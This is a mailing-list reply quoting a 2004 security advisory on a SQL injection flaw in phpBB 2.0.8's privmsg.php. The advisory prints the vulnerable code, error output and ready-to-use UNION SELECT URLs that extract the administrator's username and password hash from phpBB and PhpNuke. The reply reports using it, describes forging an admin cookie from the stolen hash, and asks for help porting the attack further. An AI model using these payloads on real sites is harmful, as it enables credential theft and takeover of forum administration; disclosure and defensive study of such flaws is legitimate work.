<<< Date Index >>>     <<< Thread Index >>>

Re: [waraxe-2004-SA#013 - Critical sql injection bug in PhpBB 2.0.8 and in older versions]



The combination of the original post with the couple of follow ups that followed were quite effective. Putting the hash in the message instead of subject worked to show the whole hash. And I can't recall if it was discussed on this thread or not but creating the admin = base64_encode($aid:$md5hash:$lang) worked to further successfully push the severity considering that if the admin's password were greater than 9 or 10 characters (assuming no dictionary words and using special chars) cracking the stolen md5 hash would not be mathematically feasible. So suffice it to say, this works very well. I noticed a patch was posted for phpBB (the patch as far as I could tell just changed a ' .= ' into a ' = ' correct?). However, this problem also worked on just the basic phpnuke. I looked around for privmsg.php within phpnuke, but none exists. I assume there is another file within nuke's modules where the '$pm_sql_user .=' exists. Already checked all the php files in the modules directory of Private_Messages (going off of a 6.0 distro), but good ol' kwrite didn't find anything when I searched the files for '$pm'. Any ideas? Thanks.



Janek Vind wrote:



{================================================================================} { [waraxe-2004-SA#013] } {================================================================================} { } { [ Critical sql injection bug in PhpBB 2.0.8 and in older versions ] } { } {================================================================================} Author: Janek Vind "waraxe"
Date: 26. March 2004
Location: Estonia, Tartu



Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


PhpBB is widely used and very popular forum software, written in php.
Homepage:  http://www.phpbb.com/



Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PhpBB 2.0.x is written very carefully and securely. But even there can be bugs, which will give to potential malicious attacker sensitive information from database - admin's
username and password's md5 hash.

So, let's look at original code from privmsg.php line 189:


*************************************************************************************

    // SQL to pull appropriate message, prevents nosey people
    // reading other peoples messages ... hopefully!
    //
    switch( $folder )
    {
        case 'inbox':
            $l_box_name = $lang['Inbox'];
$pm_sql_user = "AND pm.privmsgs_to_userid = " . $userdata['user_id'] . " AND ( pm.privmsgs_type = " . PRIVMSGS_READ_MAIL . " OR pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " )";
            break;
        case 'outbox':
            $l_box_name = $lang['Outbox'];
$pm_sql_user = "AND pm.privmsgs_from_userid = " . $userdata['user_id'] . " AND ( pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . " OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " ) ";
            break;
        case 'sentbox':
            $l_box_name = $lang['Sentbox'];
$pm_sql_user = "AND pm.privmsgs_from_userid = " . $userdata['user_id'] . " AND pm.privmsgs_type = " . PRIVMSGS_SENT_MAIL;
            break;
        case 'savebox':
            $l_box_name = $lang['Savebox'];
$pm_sql_user .= "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . " AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " ) OR ( pm.privmsgs_from_userid = " . $userdata['user_id'] . " AND pm.privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " ) )";
            break;
        default:
            message_die(GENERAL_ERROR, $lang['No_such_folder']);
            break;
    }

    //
    // Major query obtains the message ...
    //
$sql = "SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM " . PRIVMSGS_TABLE . " pm, " . PRIVMSGS_TEXT_TABLE . " pmt, " . USERS_TABLE . " u, " . USERS_TABLE . " u2 WHERE pm.privmsgs_id = $privmsgs_id AND pmt.privmsgs_text_id = pm.privmsgs_id $pm_sql_user AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid";

*****************************************************************************

As we can see, for some reason there is "$pm_sql_user .=" in case of 'savebox'. Funny thing is, that this little bug can open critical security hole to forum. First, let's try this:

http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=foobar

and we get error message:

General Error Could not query private message post information

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'foobarAND ( ( pm.privmsgs_to_userid = 2 AND pm.privmsgs_t

SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbb_privmsgs pm, phpbb_privmsgs_text pmt, phpbb_users u, phpbb_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id foobarAND ( ( pm.privmsgs_to_userid = 2 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 2 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid

Line : 238
File : D:\apache_wwwroot\phpbb206c\privmsg.php
Next, if we request this:

http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/*

then we don't get any error messages. Now it's time to do something "useful":

********************[real-life sploit]********************


http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*


********************[/real-life sploit]*******************

and we will see in plaintext admin's username and password's md5 hash ;)

And to all PhpNuke 6.x and 7.x users, here is something for you:

http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*



Post Scriptum:
I really enjoy reading of the PhpBB 2.x code, because it is written with good style and it's very secure. To all php programmers - I recommend to read the file "docs\codingstandards.htm" from
phpbb package, it will help to learn good style of the programming!




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to Stefano from UT Bee Clan!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

   come2waraxe@xxxxxxxxx
   Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------